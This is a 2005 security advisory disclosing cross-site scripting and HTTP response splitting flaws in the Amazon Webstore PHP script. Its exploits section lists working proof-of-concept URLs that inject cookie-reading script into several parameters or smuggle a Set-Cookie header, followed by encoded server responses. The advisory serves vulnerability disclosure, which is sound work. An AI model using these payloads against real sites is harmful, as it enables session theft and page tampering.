Amazon webstore script injection and XSS

#########################################################
Amazon webstore script injection and XSS
vendor:http://scripts.justwilliams.com/amazon/index.htm
advisory:http://lostmon.blogspot.com/2005/04/
amazon-webstore-script-injection-and.html
vendor informed: yes exploit available:yes
OSVDB ID:15892 , 15893 and 15894
Secunia: SA15155
BID: 13419 , 13425, 13426 , 13427 , 13428
Securitytracker:1013836
#########################################################


Amazon Webstore is a project that is currently being developed
at JustWilliam's. It is written in PHP and is designed to interface
with Amazon's vast database of products

Amazon Webstore contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate 'image' or 'currentIsExpanded''searchFor'and 'currentNumber'
upon submission to the 'index.php'and 'closeup.php' scripts.This
could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust
relationship between the browser and the server,leading to a
loss of integrity.


##########
versions:
##########

Amazon Webstore Version 04050100

also is posible prior versions are afected.
#########
Solution:
#########

no solution at this time

##########
timeline:
##########

discovered: 25 april 2005
vendor notify: 26 april 2005
vendor response:
vendor fix:
disclosure:28 april 2005

##########
exploits :
##########

http://[victim]/store/uk/product/%22%3E%3Cscript%3
Ealert(document.cookie)%3C/script%3E.htm

and server respose with this cookie :

ourhistory[uk]
a%3A1%3A%7Bs%3A47%3A%22asin-%5C%22%3E%3Cscript%3Ealert
%28document.cookie%29%3C%2Fscript%3E%22%3Ba%3A2%3A%7B
s%3A1%3A%22t%22%3Bs%3A20%3A%22-+No+product+found+
-%22%3Bs%3A1%3A%22i%22%3BN%3B%7D%7D
localhost/
1536
2981060096
29706949
933228160
29706915
*
them if we try to inject a malicious javascript it is execute
everytime what we navigate on a link of the page.

http://[victim]/store/uk/product/">%0d%0aSet-Cookie:%20
HTTP_response_splitting%3dYES%0d%0aFoo:%20bar.htm

and server respond with cookie:

ourhistory[uk]
a%3A1%3A%7Bs%3A56%3A%22asin-%0D%0ASet-Cookie%3A
+HTTP_response_splitting%3DYES%0D%0AFoo%3A+bar%22%
3Ba%3A2%3A%7Bs%3A1%3A%22t%22%3Bs%3A20%3A%22-+No
+product+found+-%22%3Bs%3A1%3A%22i%22%3BN%3B%7D%7D
localhost/
1536
1656289024
29706956
995487088
29706922
*

if we inject first url and after the second the server set this cookie:

ourhistory[uk]
a%3A3%3A%7Bs%3A47%3A%22asin-%5C%22%3E%3Cscript%3Ealert%
28document.cookie%29%3C%2Fscript%3E%22%3Ba%3A2%3A%7Bs%3
A1%3A%22t%22%3Bs%3A20%3A%22-+No+product+found+-%22%3
Bs%3A1%3A%22i%22%3BN%3B%7Ds%3A15%3A%22asin-B00004UAFX
%22%3Ba%3A2%3A%7Bs%3A1%3A%22t%22%3Bs%3A17%3A%22Story+
Book+Weaver%22%3Bs%3A1%3A%22i%22%3Bs%3A63%3A%22http%3
A%2F%2localhost%2Fimages%2FP%2FB00004UAFX.02.THUMBZZ
localhost/
1536
1656289024
29706956
995487088
29706922
*
######################
XX on others scripts
######################


http://[victim]/closeup.php?image=%22%3E%3Cscript%3E
alert(document.cookie)%3C/script%3E


http://[victim]/index.php?currentIsExpanded=0%22%3E%3Cscript
%3Ealert(document.cookie)%3C/script%3E¤tNumber=8

http://[victim]/index.php?function=search&searchFor=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


http://[victim]/uk/list/c/software_CAD_Technical_60002_uk.htm?
currentNumber=4.3%22%3E%3Cscript%3Ealert(document.cookie)%3
C/script%3E¤tIsExpanded=0

http://[victim]/index.php?country=uk
&function=search&searchFor='%20';!--%22%3CCSS_Check%3E=&{()}
&goButton=go&mode=books

is posible to others scripts are vulnerables too

################# End ###################

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to icaro he is investigate with me.
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente.